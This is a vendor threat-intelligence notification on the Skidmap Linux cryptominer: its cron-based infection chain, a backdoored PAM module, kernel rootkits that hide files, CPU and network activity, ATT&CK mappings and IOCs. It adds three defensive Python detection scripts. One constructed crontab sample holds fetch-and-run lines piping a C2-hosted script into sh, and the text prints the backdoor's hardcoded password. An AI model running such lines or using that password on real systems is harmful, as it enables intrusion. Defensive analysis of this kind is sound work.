Threat Analysis Unit (TAU) Threat Intelligence Notification: Skidmap

Hijacking machine resources to mine cryptocurrency continues to be an attractive and lucrative activity for threat actors. As this type of attack has persisted, we have also seen more platforms targeted, and cryptocurrency mining malware aimed at Linux and macOS is becoming more common. In September, Trend Micro reported on a new cryptocurrency miner targeting Linux machines. This threat remains active and is of particular interest because of the sophisticated methods it uses to hide its activity.

Behavioral Summary

The infection chain starts from a cron job. The job runs periodically and reaches out to the C2 server to download the pm.sh script. When pm.sh runs, it ensures that the main malware executable, pc, is installed and running. When pc runs, it replaces pam_unix.so with a backdoored version, then attempts to disable SELinux and installs an SSH public key as an authorized key. You can see this initial behavior in the CB Threat Hunter event log below.

Figure 1: CB Threat Hunter event log
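The cron entry is the most visible link in this chain and the easiest one to hunt for. As an added example (not code from the page or from the malware), the Python script below parses crontab text and flags scheduled commands that fetch content from the network, pipe it straight into a shell, or contact one of the DNS indicators listed at the end of this notification. The sample /etc/crontab is constructed for the example; a Skidmap domain appears in it only to exercise the IOC match, and no claim is made about the real job's exact command line.

```python
"""Scan crontab text for entries that fetch and execute remote content.

The page's infection chain starts with a cron job that periodically pulls
pm.sh from the C2 server, so scheduled commands that download from the
network (especially from the page's DNS IOCs) are a useful hunting signal.
"""
import re

# Defanged DNS IOCs copied from the page's IOC table; refanged for matching.
C2_DOMAINS_DEFANGED = (
    "pm[.]ipfswallet[.]ml",
    "pm[.]ipfswallet[.]tk",
    "info[.]onlinetalk[.]tk",
    "pm[.]cpuminerpool[.]com",
)
C2_DOMAINS = {d.replace("[.]", ".") for d in C2_DOMAINS_DEFANGED}

FETCHER_RE = re.compile(r"\b(curl|wget|fetch|ftp|tftp)\b")
URL_HOST_RE = re.compile(r"(?:https?|ftp)://([A-Za-z0-9.-]+)")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(sh|bash|dash)\b")


def parse_crontab(text, system=False):
    """Yield (schedule, user, command) per entry.

    system=True for /etc/crontab and /etc/cron.d/*, which carry a user field;
    user crontabs (crontab -l) do not. Comments, blank lines and NAME=value
    environment lines are skipped; @reboot/@daily schedules are one field.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first and not first.startswith("*"):
            continue  # environment assignment such as MAILTO=root
        nsched = 1 if line.startswith("@") else 5
        want = nsched + (1 if system else 0)
        parts = line.split(None, want)
        if len(parts) <= want:
            continue  # schedule without a command
        schedule = " ".join(parts[:nsched])
        user = parts[nsched] if system else None
        yield schedule, user, parts[want]


def assess_command(command):
    """Return the reasons a command looks like a remote fetch-and-run entry."""
    reasons = []
    hosts = [h.lower() for h in URL_HOST_RE.findall(command)]
    for host in hosts:
        if host in C2_DOMAINS:
            reasons.append("contacts known Skidmap C2 domain " + host)
    if hosts and FETCHER_RE.search(command):
        reasons.append("downloads content from " + ", ".join(hosts))
    if PIPE_TO_SHELL_RE.search(command):
        reasons.append("pipes output straight into a shell")
    return reasons


def scan_crontab(text, system=False):
    """Return [(schedule, user, command, reasons)] for entries worth a look."""
    hits = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = assess_command(command)
        if reasons:
            hits.append((schedule, user, command, reasons))
    return hits


# Constructed /etc/crontab sample for this example, not captured from a host.
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/10 *  * * *   root    curl -fsSL http://pm.ipfswallet.tk/pm.sh | sh
@reboot         root    /usr/sbin/backup-agent --quiet
0 3     * * *   root    wget -q -O /tmp/u.sh http://203.0.113.7/u.sh && sh /tmp/u.sh
"""


def demo():
    return scan_crontab(SAMPLE_SYSTEM_CRONTAB, system=True)


if __name__ == "__main__":
    for schedule, user, command, reasons in demo():
        print(f"[{schedule}] ({user}) {command}\n    -> " + "; ".join(reasons))
```

Point it at /etc/crontab and /etc/cron.d/* with system=True, and at the output of crontab -l for each user with system=False; the per-entry reasons are what you would carry into a ticket. Cron is only one persistence option, so treat a clean result as necessary rather than sufficient.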

Finally, pc determines whether it is running on a RHEL/CentOS machine or a Debian one. On a Debian-based machine it downloads the malicious miner2 application and invokes it. On a RHEL/CentOS machine it downloads a tar file, then decrypts and unpacks it. The tar file contains the rest of the payload and the mining application for RHEL/CentOS machines.

After unpacking the tar, it launches the kaudited application. This application is responsible for dropping and installing the backdoor kernel modules and for running additional binaries.

Figure 2: CB Threat Hunter process tree for kaudited

One of the binaries started by kaudited is named systemd-network (note the resemblance to the legitimate systemd-networkd service). The systemd-network binary's sole job is to start the cryptocurrency mining application pamdicks.

Details

As mentioned in the summary, one of the most interesting aspects of this threat is the great lengths that it goes to hide its activity. The following are details on the handful of system components dropped by this threat.

pam_unix.so

This module is dropped by the initial binary, pc, and dropped again by kaudited. It is a backdoored version of the standard PAM Unix authentication module. The legitimate pam_sm_authenticate simply calls unix_verify_password to check whether the authenticating user's password is valid. The backdoored version additionally accepts a hardcoded password, Mtm$%889GS3%G, which allows authentication as any user. Because the file is a drop-in replacement of a packaged library, verifying it against the package database (rpm -V pam on RHEL/CentOS, dpkg -V libpam-modules on Debian) reports a checksum mismatch for the replaced pam_unix.so; that check and a search for the hardcoded string are quick ways to confirm the backdoor on a suspect host.

iproute.ko

This kernel module is dropped by the kaudited binary. When loaded, it hides itself from the list of loaded modules and then hooks the getdents syscall, which is used to read the contents of a directory. The hooked getdents filters directory entries with the following names out of the results, so tools that enumerate directories (ls, find and anything built on readdir) never see them, while the files remain reachable by their full path:

   
kswaped              ipv6_kac.ko
kaudited             usb_control
ip6network           S94ip6network
ip4network           S95systemd-network
systemd-network      pptpctrl
xpropd               ndptxeinfo
xcond                helpmaninfo
pluto                libxml2info
mingety              pkeeminfo
xiscsd               grub2-infolist
tplinkd              loadpixcare
pascald              loadxjump
gemdos2d             irqbalanced
gloofields           libpcmcia.so
hopformdit           ld.so.preload
pkeeminfo            vpnserver
pamdicks             ssd_control
rxmlb2               iproute.ko
mdpsloads            netlink.ko
infiniex             cryptov2.ko
lzmoinfo             acpi_console.ko
picsmanager          raid_console.ko
perkiseek            ilog.h
sequemanx            olog.h
oddobjump            tinymapper
pdxmlmtg             udp2raw
mpidrubit            tinyvpn
hansiupxd            rctlconf
helpmaninfo          rctlcli
mpartinconf          rctlser
raid.ko              rctl_cert.pem
iptable_mac.ko       rctl_priv.pem
snd_pcs.ko           rctl_ca.crt
usb_pcs.ko           rctlcli.cfg

Table 1: List of files hidden by iproute.ko
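A practical check for this hiding technique follows from how it works: listing a directory goes through getdents, which the module hooks, but the page does not say stat is hooked, so probing a suspect name directly gives an independent view. The Python script below is an added example (not code from the page or the malware) that compares the two; the watchlist is a subset of Table 1, and the lister and prober are injectable so the logic can be exercised against a fake hooked listing on a temporary directory instead of an infected host. The link-count check is a general rootkit-hunting trick that does not depend on knowing the names.

```python
"""Detect entries hidden from getdents() by probing the full path directly.

os.listdir() goes through getdents(), which iproute.ko hooks; os.path.lexists()
goes through lstat(), which the page does not say is hooked. A name from the
Table 1 watchlist that stats but is absent from the listing has been hidden.
lister/prober are injectable so the logic can be exercised with a fake hook.
"""
import os
import stat
import tempfile

# Subset of Table 1 (names iproute.ko hides); extend with the full list.
SKIDMAP_HIDDEN_NAMES = (
    "kswaped", "kaudited", "systemd-network", "pamdicks", "ld.so.preload",
    "iproute.ko", "netlink.ko", "cryptov2.ko", "rctlcli.cfg", "pkeeminfo",
)


def find_hidden_entries(dirpath, watchlist=SKIDMAP_HIDDEN_NAMES,
                        lister=os.listdir, prober=os.path.lexists):
    """Watchlist names that exist in dirpath but are missing from its listing."""
    listed = set(lister(dirpath))
    return sorted(name for name in watchlist
                  if name not in listed and prober(os.path.join(dirpath, name)))


def hidden_subdir_suspected(dirpath, lister=os.listdir):
    """Watchlist-free check for hidden subdirectories.

    On ext4/xfs/tmpfs a directory's st_nlink equals 2 + its subdirectory
    count, so a link count implying more subdirectories than the listing
    shows means one is being filtered. Caveat: overlayfs and btrfs report
    st_nlink == 1 for directories, so the check is blind there (it returns
    False, never a false positive).
    """
    expected = os.stat(dirpath).st_nlink - 2
    visible = sum(
        1 for name in lister(dirpath)
        if stat.S_ISDIR(os.lstat(os.path.join(dirpath, name)).st_mode))
    return expected > visible


def demo():
    """Constructed scenario: a temp dir listed honestly and then through a fake
    getdents hook that drops watchlisted names, the way iproute.ko would."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("README", "kaudited", "netlink.ko"):
            open(os.path.join(d, name), "w").close()
        os.mkdir(os.path.join(d, "pkeeminfo"))

        def hooked_listdir(path):
            return [n for n in os.listdir(path) if n not in SKIDMAP_HIDDEN_NAMES]

        honest = find_hidden_entries(d)
        hooked = find_hidden_entries(d, lister=hooked_listdir)
        return honest, hooked, hidden_subdir_suspected(d)


if __name__ == "__main__":
    roots = ("/etc", "/usr/bin", "/usr/sbin", "/lib/modules", "/tmp", "/var/tmp")
    for root in roots:
        for dirpath, _, _ in os.walk(root):
            try:
                found = find_hidden_entries(dirpath)
                suspect = hidden_subdir_suspected(dirpath)
            except OSError:
                continue  # permission denied or the entry vanished mid-walk
            if found or suspect:
                print(dirpath, found or "(subdirectory count mismatch)")
```

Run directly, it walks a few system roots and prints anything flagged. A rootkit that also hooks stat or open defeats the probe, so an offline view (rescue media, or the disk image mounted elsewhere) remains the stronger check.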

netlink.ko

This kernel module is dropped by the kaudited binary. When loaded, it hides itself from the list of loaded modules. It also hooks the getdents syscall and compares the returned entries against a list of hardcoded strings to decide whether each entry should be hidden.

It then hooks the seq_show implementations for TCP and UDP over IPv4 and IPv6, the functions that produce /proc/net/tcp, /proc/net/tcp6, /proc/net/udp and /proc/net/udp6. This hides the miner's connections from netstat and any other tool that reads those files; ss queries the kernel through the sock_diag netlink interface and falls back to /proc/net only when that fails, so a disagreement between netstat and ss output on the same host is a quick consistency check. Finally, the following functions are hooked in order to hide the CPU and load-average usage of the malware:

  • account_user_time
  • acct_account_cputime
  • task_nice
  • cpuacct_account_field
  • loadavg_proc_show
  • nr_running
  • task_active_pid_ns

The goal of this module is to allow the cryptocurrency mining application to run without letting users on the system see the increased usage of the CPU and network.

cryptov2.ko

This kernel module is dropped by the kaudited binary. When loaded, it hides itself from the list of loaded modules and then registers two netfilter hooks, at NF_INET_LOCAL_IN and NF_INET_LOCAL_OUT, both for NFPROTO_IPV4. These hook points see every IPv4 packet addressed to or originating from the host (but not traffic merely forwarded through it), so the module could potentially inspect all of the machine's own incoming and outgoing packets. Although the initialization code registers two hooks, the hook function for NF_INET_LOCAL_OUT is NULL'ed out, so only incoming packets are actually inspected. The module allows any traffic that is not TCP or UDP. For TCP and UDP it inspects the packets for certain ports and selectively allows or denies the traffic.
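To make the hook logic concrete, here is an added Python model (not code from the page or from the malware) of an NF_INET_LOCAL_IN hook function deciding on raw IPv4 packets: anything that is not TCP or UDP is accepted unconditionally, and TCP/UDP is judged by destination port. The page does not name the ports the module checks, so the denied port 2222, the deny-by-destination policy and the sample packets are all constructed for the example; the verdict constants are the real NF_DROP/NF_ACCEPT values.

```python
"""User-space model of an NF_INET_LOCAL_IN hook deciding on raw IPv4 packets.

Mirrors the logic the page attributes to cryptov2.ko: anything that is not
TCP or UDP passes; TCP/UDP is checked against a port policy. The port set is
hypothetical (the page only says "certain ports"); packets are constructed.
"""
import socket
import struct

IPPROTO_ICMP, IPPROTO_TCP, IPPROTO_UDP = 1, 6, 17
NF_DROP, NF_ACCEPT = 0, 1  # verdict values as in linux/netfilter.h


def parse_ipv4(pkt):
    """Return (proto, src, dst, sport, dport); ports are None unless TCP/UDP.
    Raises ValueError for headers a careful hook must not interpret."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    version, ihl = pkt[0] >> 4, (pkt[0] & 0x0F) * 4
    if version != 4 or ihl < 20 or len(pkt) < ihl:
        raise ValueError("bad version or IHL")
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if total_len < ihl or total_len > len(pkt):
        raise ValueError("bad total length")
    proto = pkt[9]
    src, dst = socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20])
    sport = dport = None
    if proto in (IPPROTO_TCP, IPPROTO_UDP):
        if total_len < ihl + 4:
            raise ValueError("truncated transport header")
        sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    return proto, src, dst, sport, dport


class LocalInHook:
    """The hook function. denied_dports is a hypothetical policy, not the module's."""

    def __init__(self, denied_dports):
        self.denied_dports = frozenset(denied_dports)
        self.log = []

    def __call__(self, pkt):
        try:
            proto, src, dst, sport, dport = parse_ipv4(pkt)
        except ValueError as err:
            self.log.append(("malformed", str(err)))
            return NF_DROP  # model choice: refuse what cannot be parsed
        if proto not in (IPPROTO_TCP, IPPROTO_UDP):
            return NF_ACCEPT  # page: non-TCP/UDP traffic is always allowed
        verdict = NF_DROP if dport in self.denied_dports else NF_ACCEPT
        self.log.append((proto, src, sport, dst, dport, verdict))
        return verdict


# --- packet builders for the constructed samples ---------------------------

def _checksum(data):
    """RFC 1071 one's-complement checksum over the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4(proto, src, dst, transport):
    """20-byte IPv4 header (no options) with a valid checksum + transport bytes."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(transport), 0x1234,
                      0x4000, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:] + transport


def tcp_syn(sport, dport):
    """Minimal 20-byte TCP header with SYN set; TCP checksum left 0 (not checked here)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)


def udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def demo():
    """Verdicts for four constructed packets against a hypothetical deny set {2222}."""
    hook = LocalInHook(denied_dports={2222})
    packets = {
        "icmp_echo": build_ipv4(IPPROTO_ICMP, "203.0.113.9", "198.51.100.4",
                                struct.pack("!BBHHH", 8, 0, 0, 1, 1)),
        "tcp_to_2222": build_ipv4(IPPROTO_TCP, "203.0.113.9", "198.51.100.4",
                                  tcp_syn(40000, 2222)),
        "udp_dns": build_ipv4(IPPROTO_UDP, "203.0.113.9", "198.51.100.4",
                              udp(40001, 53, b"\x12\x34")),
        "truncated": b"\x45\x00\x00",
    }
    return {name: hook(pkt) for name, pkt in packets.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:12s} -> {'NF_ACCEPT' if verdict == NF_ACCEPT else 'NF_DROP'}")
```

The parse-then-decide shape is the same one a defender uses in a user-space packet audit; what the model leaves out is the in-kernel housekeeping (an skb may be non-linear, so a real hook must obtain the header through skb_header_pointer rather than indexing raw bytes), which is not relevant to the verdict logic the page describes.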


MITRE ATT&CK TIDs

TID     Tactic                   Description
T1168   Persistence, Execution   Local Job Scheduling
T1215   Persistence              Kernel Modules and Extensions
T1045   Defense Evasion          Software Packing
T1089   Defense Evasion          Disabling Security Tools
T1036   Defense Evasion          Masquerading
T1014   Defense Evasion          Rootkit
T1071   Command And Control      Standard Application Layer Protocol
T1496   Impact                   Resource Hijacking

Indicators of Compromise (IOCs)

Indicator                                                           Type     Context
3da213cceba51e123a31b4a67f461ef8901d2b77505776ab9852df9edbbd10c9    SHA256   pm.sh
d797706202e9291ffce6729ac98aad5bd3ae1aef5e01da9139395f038e94fb2f    SHA256   pc
3b1dafb3dd42a4d7d4d85a9972151f8c99f00a9613b90253df0f043b3a46cb69    SHA256   miner2
d50fd8996435b4e8d74ab824ba4c3cf4e54558dd4fd5da9abe3269ea82a1eda2    SHA256   pam_unix.so
f706def8a4366e8ed3f0f14825b8901e7af5154f28dfb44288d4d596012ee542    SHA256   iproute.ko
eddad25adce89b5954ddf6d85936ec5bdec6ccd20eda1f0fbce527f69347bc32    SHA256   netlink.ko
3064ed1844054e65a1313c4ce61777b259df0c1ec335618f9154430fccf6ef29    SHA256   cryptov2.ko
954e08c703a5be53c96ac08ad14cd27ff9ac658b2e09c11e1f303aa4630bc1ab    SHA256   systemd-network
b81e85de4419ce820a59f36ec583fb9e37ec50f9ef45d0484f6ebb993c70954e    SHA256   kswaped
f6d419af8a67de46d60365929629ae5884bde82964cb5bce376aadb6a72f93d6    SHA256   pamdicks
pm[.]ipfswallet[.]ml                                                DNS      C2
pm[.]ipfswallet[.]tk                                                DNS      C2
info[.]onlinetalk[.]tk                                              DNS      C2
pm[.]cpuminerpool[.]com                                             DNS      C2

The post Threat Analysis Unit (TAU) Threat Intelligence Notification: Skidmap appeared first on VMware Carbon Black.

Article Link: https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-skidmap/